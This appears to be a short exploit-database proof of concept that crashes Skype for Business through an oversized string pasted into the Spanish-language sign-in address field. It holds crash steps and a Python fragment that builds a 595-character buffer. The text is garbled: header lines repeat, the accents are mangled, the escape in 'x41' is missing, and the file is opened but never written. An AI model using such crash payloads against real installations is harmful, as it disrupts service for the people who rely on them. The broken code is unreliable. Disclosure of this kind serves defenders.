# Exploit Title: Skype Empresarial Office 365 16.0.10730.20053 - 'DirecciA3n de inicio de sesiA3n' Denial of service (PoC)
# Discovery by: Samuel Cruz
# Discovery Date; 2018-08-29
# Discovery by: Samuel Cruz
# Discovery Date; 2018-08-29
# Vendor Homepage: https://www.skype.com/es/business/
# Tested Version: 16.0.10730.20053
# Tested on OS: Windows 10 Pro x64 es/home/

#Steps to produce the crash
#1.- Run python code : python SkypeforBusiness_16.0.10730.20053.py
#2.- Open SkypeforBusiness.txt and copy context to clipboard
#3.- Open Skype for business
#4.- Paste clipboard on "DirecciA3n de inicio de sesiA3n"
#5.- Iniciar sesiA3n
#6.- Crashed

buffer = "x41" * 595
f = open ("SkypeforBusiness.txt", "w")